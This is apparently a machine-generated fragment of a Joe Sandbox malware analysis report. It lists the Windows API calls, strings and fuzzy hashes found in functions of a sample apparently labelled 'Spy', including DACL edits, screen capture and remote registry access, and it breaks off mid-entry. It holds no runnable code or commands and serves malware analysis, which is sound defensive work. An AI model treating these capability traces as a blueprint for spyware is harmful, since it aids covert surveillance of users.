                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0EA
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C0F7
                                                      • GlobalLock.KERNEL32(00000000), ref: 00B0C100
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C10F
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00B0C118
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C11F
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B0982C,?,?,00000000,?), ref: 00B0C130
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B13C7C,?), ref: 00B0C149
                                                      • GlobalFree.KERNEL32(00000000), ref: 00B0C159
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00B0C17D
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B0C1A8
                                                      • DeleteObject.GDI32(00000000), ref: 00B0C1D0
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B0C1E6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 9bf057a9e07ebb255910939d1a9381b01c48d7a5555d239c3fc2bb69935fbaf3
                                                      • Instruction ID: e308e16a440de1a3d5c1adcd6d6b90f21190f67d7fa8a1c9b173e296507fb409
                                                      • Opcode Fuzzy Hash: 9bf057a9e07ebb255910939d1a9381b01c48d7a5555d239c3fc2bb69935fbaf3
                                                      • Instruction Fuzzy Hash: F9414B75500208FFDB119F65DC88EAA7FB8EF89711F508158F905E72A0DB709981DB60
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B0C8A4
                                                      • GetFocus.USER32 ref: 00B0C8B4
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00B0C8BF
                                                      • _memset.LIBCMT ref: 00B0C9EA
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B0CA15
                                                      • GetMenuItemCount.USER32(?), ref: 00B0CA35
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00B0CA48
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B0CA7C
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B0CAC4
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B0CAFC
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B0CB31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 73ed0ca9f8922b5983fdbbbdb10088deb8570f96d30a0f8349c15d97697cb4f2
                                                      • Instruction ID: ad7bc20434eb38681d96d4a15e916be5e6fb396565b578f2de069b5e33c6ccc3
                                                      • Opcode Fuzzy Hash: 73ed0ca9f8922b5983fdbbbdb10088deb8570f96d30a0f8349c15d97697cb4f2
                                                      • Instruction Fuzzy Hash: 73818B71608305AFDB10DF14C985AABBFE8FB88354F104AADF99593291CB70DD05CBA2
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00AEE31F
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AEE32F
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AEE33B
                                                      • _wcscat.LIBCMT ref: 00AEE3B1
                                                      • _wcscat.LIBCMT ref: 00AEE3C3
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AEE3D8
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE3EC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE41E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE43F
                                                      • _wcscpy.LIBCMT ref: 00AEE44B
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AEE48A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3904293833-438819550
                                                      • Opcode ID: d5d3c271a337c695abca5668efea5f7e505e26038a5df4be24a4566012377e98
                                                      • Instruction ID: 39b4d99072d8692de0340166750a7eb4178a354c4177cd9ab68e4846bd244a7a
                                                      • Opcode Fuzzy Hash: d5d3c271a337c695abca5668efea5f7e505e26038a5df4be24a4566012377e98
                                                      • Instruction Fuzzy Hash: 9C6168725047859FCB10EF65C984A9EB3E8FF89310F04891EF989C7251EB35E945CB92
                                                      APIs
                                                        • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
                                                        • Part of subcall function 00AD8E20: GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
                                                        • Part of subcall function 00AD8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
                                                        • Part of subcall function 00AD8E20: HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
                                                        • Part of subcall function 00AD8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73
                                                        • Part of subcall function 00AD8EBD: GetProcessHeap.KERNEL32(00000008,00AD8916,00000000,00000000,?,00AD8916,?), ref: 00AD8EC9
                                                        • Part of subcall function 00AD8EBD: HeapAlloc.KERNEL32(00000000,?,00AD8916,?), ref: 00AD8ED0
                                                        • Part of subcall function 00AD8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AD8916,?), ref: 00AD8EE1
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD8B2E
                                                      • _memset.LIBCMT ref: 00AD8B43
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AD8B62
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AD8B73
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00AD8BB0
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AD8BCC
                                                      • GetLengthSid.ADVAPI32(?), ref: 00AD8BE9
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AD8BF8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AD8BFF
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AD8C20
                                                      • CopySid.ADVAPI32(00000000), ref: 00AD8C27
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AD8C58
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AD8C7E
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AD8C92
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: 5926f60c357b2184974bd5bd475c3ae741e99168c57ba99ab238afbfa3e8700d
                                                      • Instruction ID: 4396501bf34a0b2f9c01422483ade888c3629a8ad36ddb87fbe38545bf3d2428
                                                      • Opcode Fuzzy Hash: 5926f60c357b2184974bd5bd475c3ae741e99168c57ba99ab238afbfa3e8700d
                                                      • Instruction Fuzzy Hash: 91614875910209EFDF10AFA1DD44EEEBB79BF04300F04816AF916A7290DF799A05CB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00AF7A79
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AF7A85
                                                      • CreateCompatibleDC.GDI32(?), ref: 00AF7A91
                                                      • SelectObject.GDI32(00000000,?), ref: 00AF7A9E
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AF7AF2
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00AF7B2E
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AF7B52
                                                      • SelectObject.GDI32(00000006,?), ref: 00AF7B5A
                                                      • DeleteObject.GDI32(?), ref: 00AF7B63
                                                      • DeleteDC.GDI32(00000006), ref: 00AF7B6A
                                                      • ReleaseDC.USER32(00000000,?), ref: 00AF7B75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 9d547aece3425f95af065fdf763813507df3d31e7139c8601411319aa88643f0
                                                      • Instruction ID: 3929ef2fc870f8ed2e6b49c157a2514838faa8b39d8ab59a0e7544b25599e390
                                                      • Opcode Fuzzy Hash: 9d547aece3425f95af065fdf763813507df3d31e7139c8601411319aa88643f0
                                                      • Instruction Fuzzy Hash: 0E515D71904309EFCB15DFA8CC89EAEBBB9EF48350F14841DFA5AA7250D771A941CB60
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA4D4
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00AEA4F6
                                                      • __swprintf.LIBCMT ref: 00AEA54F
                                                      • __swprintf.LIBCMT ref: 00AEA568
                                                      • _wprintf.LIBCMT ref: 00AEA61E
                                                      • _wprintf.LIBCMT ref: 00AEA63C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-2391861430
                                                      • Opcode ID: bb43a1855236ae99e21708cb6794a2e137c11bbc98bf3d8e24b8c0755776f8d1
                                                      • Instruction ID: 916fa820d9fc6957dd68c57de1b0125657e1e5c34403a4b452fa2ed8c1578c1f
                                                      • Opcode Fuzzy Hash: bb43a1855236ae99e21708cb6794a2e137c11bbc98bf3d8e24b8c0755776f8d1
                                                      • Instruction Fuzzy Hash: 6551AF7194011AABCF15EBE0CE86EEEB7B9AF15340F604165F505B20A2EF316F58CB61
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A95BF1
                                                      • GetMenuItemCount.USER32(00B47890), ref: 00AD0E7B
                                                      • GetMenuItemCount.USER32(00B47890), ref: 00AD0F2B
                                                      • GetCursorPos.USER32(?), ref: 00AD0F6F
                                                      • SetForegroundWindow.USER32(00000000), ref: 00AD0F78
                                                      • TrackPopupMenuEx.USER32(00B47890,00000000,?,00000000,00000000,00000000), ref: 00AD0F8B
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AD0F97
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 2751501086-0
                                                      • Opcode ID: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
                                                      • Instruction ID: cab97db5cce7f61a7fc6afe098db7ab369d69d1d87f2c2afea590e0c72f00b87
                                                      • Opcode Fuzzy Hash: 192a7dea67b8a985c883df7a3e3c55a268a2492bb4dcffe7dea91ff83a28959b
                                                      • Instruction Fuzzy Hash: D371E330A44609BFEF219B65CC85FAABFA9FF04364F244217F515A62D1CBB1A850DB90
                                                      APIs
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      • _memset.LIBCMT ref: 00AD8489
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AD84BE
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AD84DA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AD84F6
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AD8520
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AD8548
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8553
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AD8558
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
                                                      • Instruction ID: 906e5ff5acd6ec8a9590a181f2135083653b01afff53c29e91e91692f9802743
                                                      • Opcode Fuzzy Hash: 04784ad22b747d12018abf9147975b2245e92bc795f385894595daab571eb491
                                                      • Instruction Fuzzy Hash: 0041F872D1022EABCF11EBA4DD95DEDB7B8FF04340F404569F816A3261EA759E44CB90
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      • Opcode ID: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
                                                      • Instruction ID: f97a8a8cf1eb4a383f772ff72ba877b3be9fe0ddeaaf45cba8c5088abeb68a74
                                                      • Opcode Fuzzy Hash: 0d7ce15418cb88c83e97b9dce18ab3681a5badb6ccf46ee4b3a03324a9e5d23f
                                                      • Instruction Fuzzy Hash: E0411B3250025A8BDF08EF94D981AEA3BA4FF62344F604895FC526B292DB30ED19CB50
                                                      APIs
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                        • Part of subcall function 00A9153B: _memmove.LIBCMT ref: 00A915C4
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AE58EB
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AE5901
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AE5912
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AE5924
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AE5935
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      • Opcode ID: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
                                                      • Instruction ID: 318a1e3be6267dc776b9cd56e925c2e4713f7a41b799c236314b008154d045e4
                                                      • Opcode Fuzzy Hash: d686f9ca0b805fe397c4b2d3a7500d4353998188bb9d9dfe2fdb93aac5080395
                                                      • Instruction Fuzzy Hash: 16118231A9016AB9DB20A7A2DC5ADFF7BBCEBD1B50F900469B501A30E5EE601D05C5A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      • Opcode ID: 04f6b3eb3d6217cac5cd006f3cd7da4577806327541091d09b3e640c92960818
                                                      • Instruction ID: 58fe7ac41c4177cd3c89b18483b0751537cdf81b8907058fe57355a5b157bc8c
                                                      • Opcode Fuzzy Hash: 04f6b3eb3d6217cac5cd006f3cd7da4577806327541091d09b3e640c92960818
                                                      • Instruction Fuzzy Hash: 3011E431919118AFDB11BB759D4AEEE77BCDF89710F1441A5F005970D1EFB099C18B90
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00AE5535
                                                        • Part of subcall function 00AA083E: timeGetTime.WINMM(?,00000002,00A8C22C), ref: 00AA0842
                                                      • Sleep.KERNEL32(0000000A), ref: 00AE5561
                                                      • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00AE5585
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AE55A7
                                                      • SetActiveWindow.USER32 ref: 00AE55C6
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AE55D4
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AE55F3
                                                      • Sleep.KERNEL32(000000FA), ref: 00AE55FE
                                                      • IsWindow.USER32 ref: 00AE560A
                                                      • EndDialog.USER32(00000000), ref: 00AE561B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 94f59db3d6f5999c31c6442a118367204fcd459abf960a16c46b810fc928186e
                                                      • Instruction ID: dba5fc382027a19dcd79da0f6c5f5bca5546c01d96bbf36bc17c3cc8f8965694
                                                      • Opcode Fuzzy Hash: 94f59db3d6f5999c31c6442a118367204fcd459abf960a16c46b810fc928186e
                                                      • Instruction Fuzzy Hash: F421A178A04684AFEB416F75FD89A7A3B6AFB56349F445019F101831A1CFB18E90DA31
                                                      APIs
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • CoInitialize.OLE32(00000000), ref: 00AEDC2D
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AEDCC0
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00AEDCD4
                                                      • CoCreateInstance.OLE32(00B13D4C,00000000,00000001,00B3B86C,?), ref: 00AEDD20
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AEDD8F
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00AEDDE7
                                                      • _memset.LIBCMT ref: 00AEDE24
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00AEDE60
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AEDE83
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00AEDE8A
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00AEDEC1
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00AEDEC3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
